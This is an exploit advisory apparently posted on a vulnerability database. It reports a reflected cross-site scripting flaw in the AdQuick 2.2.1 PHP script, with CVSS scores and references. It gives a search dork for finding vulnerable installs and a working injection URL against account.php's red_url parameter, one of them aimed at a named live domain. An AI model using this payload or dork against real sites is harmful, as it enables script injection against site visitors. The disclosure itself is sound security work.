AdQuick 2.2.1 Remote XSS Vulnerabilities

2010.03.15
Credit: Moudi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[&#187;] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [&#187;] AdQuick 2.2.1 Remote XSS Vulnerabilities ============================================================================== [&#187;] Script: [ AdQuick 2.2.1 ] [&#187;] Language: [ PHP ] [&#187;] Download: [ http://www.phplemon.com/adquick-adbrite-clone.php ] [&#187;] Founder: [ Moudi <m0udi@9.cn> ] [&#187;] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [&#187;] Team: [ EvilWay ] [&#187;] Dork: [ Powered By AdQuick 2.2 / &#169; 2009 AdQuick 2.2 ] [&#187;] Price: [ $249 ] [&#187;] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit XSS + LIVE : vulnerability ]=== [&#187;] http://www.site.com/patch/account.php?smw&red_url=[XSS] [&#187;] http://www.adquick.co.uk/account.php?smw&red_url=1>"><ScRiPt %0A%0D>alert(322094267678)%3B</ScRiPt> Author: Moudi ##############

References:

http://xforce.iss.net/xforce/xfdb/51857
http://secunia.com/advisories/35926
http://packetstormsecurity.org/0907-exploits/adquick-xss.txt
http://osvdb.org/56056


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top